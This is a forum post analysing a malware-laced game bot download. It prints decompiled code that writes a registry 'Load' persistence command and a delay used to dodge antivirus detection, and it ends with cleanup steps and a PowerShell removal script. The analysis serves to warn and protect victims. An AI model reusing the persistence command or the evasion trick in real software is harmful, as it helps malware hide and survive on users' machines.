This thread is probably in the wrong section, however I decided to post it here because the users who downloaded it most likely don't check the other sections. Also, the original thread is closed.
It contained the following files:
- farmbot
- TargetMinimap.exe (bad boy)
- config.ini (legit)
- General Bot.exe (legit)
- hook.dll (confuse file)
- interface.asi (confuse file)
- NeuzInfiltration.dll (confuse file)
- upgrading.dll (confuse file)
Most of the files are there to add extra layers of "confusion" about what is happening, to prevent suspicion.
hook.dll is most likely not used due to how the bot worked. It worked by pixel scanning and had nothing to do with memory.
interface.asi is most likely not associated with the bot either. I cannot really speak on this however after a little bit of analysis it seems to be a dll regarding sound.
NeuzInfiltration.dll: do I have to say anything about this one? No.
upgrading.dll is a dll that has been renamed to confuse the user. It was previously Miles Sound System (Company Name: RAD Game Tools, Inc.).
General Bot.exe is the legit thing which contains the au3 script as a resource. Nothing more to say.
farmbot -> TargetMinimap.exe is however the interesting part of this. It is software written in a .NET language and protected by SmartAssembly. Some naughty stuff can be found inside this one.
I have not analysed it thoroughly, however a couple of things caught my attention.
First thing:
Code:
standardInput.Write(string.Concat(new string[] { Class5.smethod_1("ZoZsR/ZaAWzxqaKwo+nWGkxoLc6Ds9GNObStufkfOT2TLcBbjyvMGWz5Ui7BQiviEu7Vk8MO6FJ1iaMc1ALpfry+mE2yigOyL28GnNKe0ab37UCQ2TsndQdis/7A49IH"), "%temp%\\", Class5.smethod_1("35HUeD+OlAq9ZwumSXi79g=="), "\\", Class5.smethod_1("2atqj4HZ4WJ029aPZ3Ly2d46DqSi1+THRQs1q+XH92I="), ".lnk \" /f", Environment.NewLine }));
The three Class5.smethod_1 calls decode, in order, to:
reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "
FlyFF Bot
generalbotstart.exe
Concatenated with the plain-text pieces, the line written to the command processor is:
reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "%temp%\FlyFF Bot\generalbotstart.exe.lnk" /f
The registry key that the bot adds prevents the startup programs from running when restarting the computer. It can be resolved by deleting the key in the registry.
Another thing that caught my attention was the following code:
Code:
// Decompiler output restructured without the IL_ labels; behaviour is unchanged.
if (Class5.smethod_0(Class5.smethod_1("kH6hMrdds0P1ED86mOaZMg==")))
{
    num2 = 11;
    Thread.Sleep(26001); // wait 26 seconds before continuing
}
This is a bit of code meant to stop Avast from flagging it as a virus. It is a known method and is documented on the internet.
It makes a copy of TargetMinimap.exe in the following directory: %temp%\FlyFF Bot
Make sure to delete those files and fix the registry as mentioned above. As I said before, I did not analyse it thoroughly, I'm sure it contained more bullshit, so watch out boys.
TL;DR
Delete the key named Load in registry located at HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
Go to %temp%\FlyFF Bot in the file explorer and delete the shortcut and the duplicated virus.
Do not restart your computer before you've done these fixes. Otherwise an empty message box will pop up and once you hit OK, the virus will kick in and do a bunch of naughty stuff.
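The two TL;DR steps above as a check-and-clean script, added here as an example and not part of the original post. It assumes the value name Load, the key path and the %temp%\FlyFF Bot folder exactly as reported above; it only reports unless run with -Remove, so you can confirm what is there before deleting anything.

```powershell
# Added example: report (and optionally remove) the persistence described in the post.
# Assumes the registry value "Load" and the %temp%\FlyFF Bot folder exactly as reported.
param([switch]$Remove)  # without -Remove the script only reports what it finds

$keyPath   = 'HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows'
$valueName = 'Load'
$dropDir   = Join-Path $env:TEMP 'FlyFF Bot'

# 1. The Load value is normally absent or empty on a clean profile. The sample pointed it
#    at a .lnk under %temp%\FlyFF Bot, so any non-empty value here deserves a look.
$loadValue = (Get-ItemProperty -Path $keyPath -Name $valueName -ErrorAction SilentlyContinue).$valueName
if ([string]::IsNullOrEmpty($loadValue)) {
    Write-Host "[ok] No '$valueName' value under $keyPath"
} else {
    Write-Host "[!!] '$valueName' is set to: $loadValue"
    if ($Remove) {
        Remove-ItemProperty -Path $keyPath -Name $valueName
        Write-Host "[fix] Removed '$valueName' value"
    }
}

# 2. The drop directory holding the shortcut and the copied TargetMinimap.exe.
#    File names and hashes are printed first so they can be kept for reference.
if (Test-Path -LiteralPath $dropDir) {
    Write-Host "[!!] Found $dropDir containing:"
    Get-ChildItem -LiteralPath $dropDir -File -Force | ForEach-Object {
        $hash = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
        Write-Host ("      {0}  {1} bytes  sha256={2}" -f $_.Name, $_.Length, $hash)
    }
    if ($Remove) {
        Remove-Item -LiteralPath $dropDir -Recurse -Force
        Write-Host "[fix] Removed $dropDir"
    }
} else {
    Write-Host "[ok] $dropDir not present"
}
```

Run it once without -Remove to see the current state, then with -Remove to clean up before the next reboot, as the post advises.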